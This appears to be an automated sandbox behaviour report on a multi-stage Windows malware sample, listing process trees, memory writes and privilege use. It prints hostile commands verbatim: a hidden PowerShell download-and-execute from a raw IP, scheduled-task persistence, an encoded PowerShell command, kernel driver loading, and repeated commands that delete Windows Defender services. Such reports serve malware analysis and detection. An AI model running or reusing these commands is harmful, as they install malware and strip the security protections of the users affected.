description pid Process Token: SeDebugPrivilege 5816 powershell.exe Token: SeDebugPrivilege 2996 NHq7LaU.exe Token: SeDebugPrivilege 4344 chrome.exe Token: SeShutdownPrivilege 4780 msiexec.exe Token: SeIncreaseQuotaPrivilege 4780 msiexec.exe Token: SeSecurityPrivilege 244 msiexec.exe Token: SeCreateTokenPrivilege 4780 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4780 msiexec.exe Token: SeLockMemoryPrivilege 4780 msiexec.exe Token: SeIncreaseQuotaPrivilege 4780 msiexec.exe Token: SeMachineAccountPrivilege 4780 msiexec.exe Token: SeTcbPrivilege 4780 msiexec.exe Token: SeSecurityPrivilege 4780 msiexec.exe Token: SeTakeOwnershipPrivilege 4780 msiexec.exe Token: SeLoadDriverPrivilege 4780 msiexec.exe Token: SeSystemProfilePrivilege 4780 msiexec.exe Token: SeSystemtimePrivilege 4780 msiexec.exe Token: SeProfSingleProcessPrivilege 4780 msiexec.exe Token: SeIncBasePriorityPrivilege 4780 msiexec.exe Token: SeCreatePagefilePrivilege 4780 msiexec.exe Token: SeCreatePermanentPrivilege 4780 msiexec.exe Token: SeBackupPrivilege 4780 msiexec.exe Token: SeRestorePrivilege 4780 msiexec.exe Token: SeShutdownPrivilege 4780 msiexec.exe Token: SeDebugPrivilege 4780 msiexec.exe Token: SeAuditPrivilege 4780 msiexec.exe Token: SeSystemEnvironmentPrivilege 4780 msiexec.exe Token: SeChangeNotifyPrivilege 4780 msiexec.exe Token: SeRemoteShutdownPrivilege 4780 msiexec.exe Token: SeUndockPrivilege 4780 msiexec.exe Token: SeSyncAgentPrivilege 4780 msiexec.exe Token: SeEnableDelegationPrivilege 4780 msiexec.exe Token: SeManageVolumePrivilege 4780 msiexec.exe Token: SeImpersonatePrivilege 4780 msiexec.exe Token: SeCreateGlobalPrivilege 4780 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe Token: SeTakeOwnershipPrivilege 244 msiexec.exe Token: SeRestorePrivilege 244 msiexec.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5208 firefox.exe 5680 96b3ec11f4.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5680 96b3ec11f4.exe 5208 firefox.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5756 Passwords.com 5756 Passwords.com 5756 Passwords.com -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5208 firefox.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5680 96b3ec11f4.exe 5756 Passwords.com 5756 Passwords.com 5756 Passwords.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4344 chrome.exe 5208 firefox.exe 4768 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3012 wrote to memory of 5328 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3012 wrote to memory of 5328 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3012 wrote to memory of 5328 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3012 wrote to memory of 2624 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3012 wrote to memory of 2624 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3012 wrote to memory of 2624 3012 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 5328 wrote to memory of 5164 5328 cmd.exe 89 PID 5328 wrote to memory of 5164 5328 cmd.exe 89 PID 5328 wrote to memory of 5164 5328 cmd.exe 89 PID 2624 wrote to memory of 5816 2624 mshta.exe 92 PID 2624 wrote to memory of 5816 2624 mshta.exe 92 PID 2624 wrote to memory of 5816 2624 mshta.exe 92 PID 5816 wrote to memory of 2888 5816 powershell.exe 99 PID 5816 wrote to memory of 2888 5816 powershell.exe 99 PID 5816 wrote to memory of 2888 5816 powershell.exe 99 PID 2888 wrote to memory of 2492 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 100 PID 2888 wrote to memory of 2492 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 100 PID 2888 wrote to memory of 2492 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 100 PID 2492 wrote to memory of 2824 2492 rapes.exe 104 PID 2492 wrote to memory of 2824 2492 rapes.exe 104 PID 2492 wrote to memory of 2824 2492 rapes.exe 104 PID 2824 wrote to memory of 4896 2824 PQPYAYJJ.exe 105 PID 2824 wrote to memory of 4896 2824 PQPYAYJJ.exe 105 PID 2824 wrote to memory of 4896 2824 PQPYAYJJ.exe 105 PID 4896 wrote to memory of 4012 4896 Abspawnhlp.exe 106 PID 4896 wrote to memory of 4012 4896 Abspawnhlp.exe 106 PID 4896 wrote to memory of 4012 4896 Abspawnhlp.exe 106 PID 2492 wrote to memory of 5612 2492 rapes.exe 107 PID 2492 wrote to memory of 5612 2492 rapes.exe 107 PID 5612 wrote to memory of 2340 5612 h8NlU62.exe 108 PID 5612 wrote to memory of 2340 5612 h8NlU62.exe 108 PID 5612 wrote to memory of 2340 5612 h8NlU62.exe 108 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 5612 wrote to memory of 4372 5612 h8NlU62.exe 109 PID 2492 wrote to memory of 2996 2492 rapes.exe 111 PID 2492 wrote to memory of 2996 2492 rapes.exe 111 PID 4012 wrote to memory of 6020 4012 Abspawnhlp.exe 112 PID 4012 wrote to memory of 6020 4012 Abspawnhlp.exe 112 PID 4012 wrote to memory of 6020 4012 Abspawnhlp.exe 112 PID 2996 wrote to memory of 5768 2996 NHq7LaU.exe 113 PID 2996 wrote to memory of 5768 2996 NHq7LaU.exe 113 PID 2996 wrote to memory of 4344 2996 NHq7LaU.exe 115 PID 2996 wrote to memory of 4344 2996 NHq7LaU.exe 115 PID 4344 wrote to memory of 1448 4344 chrome.exe 116 PID 4344 wrote to memory of 1448 4344 chrome.exe 116 PID 4012 wrote to memory of 6020 4012 Abspawnhlp.exe 112 PID 4012 wrote to memory of 6020 4012 Abspawnhlp.exe 112 PID 2492 wrote to memory of 2808 2492 rapes.exe 118 PID 2492 wrote to memory of 2808 2492 rapes.exe 118 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 PID 2808 wrote to memory of 2892 2808 qWR3lUj.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2896
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:7616
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 3SkIZmaCG4s /tr "mshta C:\Users\Admin\AppData\Local\Temp\NFOm4GGDO.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 3SkIZmaCG4s /tr "mshta C:\Users\Admin\AppData\Local\Temp\NFOm4GGDO.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5164
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\NFOm4GGDO.hta2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5816 -
C:\Users\Admin\AppData\Local\TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE"C:\Users\Admin\AppData\Local\TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe9⤵
- Downloads MZ/PE file
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6020 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1880 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3412 -
C:\Users\Admin\Abspawnhlp.exeC:\Users\Admin\Abspawnhlp.exe12⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- System Location Discovery: System Language Discovery
PID:1312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"10⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5700
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet10⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"10⤵
- Executes dropped EXE
PID:680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 8011⤵
- Program crash
PID:5704
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4092
-
-
C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:648 -
C:\Users\Admin\CamMenuMaker.exe"C:\Users\Admin\CamMenuMaker.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1656 -
C:\Users\Admin\CamMenuMaker.exeC:\Users\Admin\CamMenuMaker.exe12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:6400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:8148
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4444
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5612 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2340
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:5768
-
-
C:\ProgramData\Google\Chrome\chrome.exe"C:\ProgramData\Google\Chrome\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:1448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:912 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DF54.tmp\DF55.tmp\DF65.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1972 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DFE0.tmp\DFE1.tmp\DFE2.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
PID:1048 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3432
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5784
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:4628
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:60
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5612
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3688
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2448
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1544
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:5884
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:3360
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:2440
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4084
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:3104
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:3708
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5176
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:5016
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:5272
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:3896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:4028
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:3628
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:1868
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:5860
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:5700
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:4848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:3788
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:1324
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:2732
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:4816
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4924
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:2856
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:4200
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2284
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5768
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:2428
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:932
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3744
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:836
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:1588
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:4892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:1448
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:224
-
-
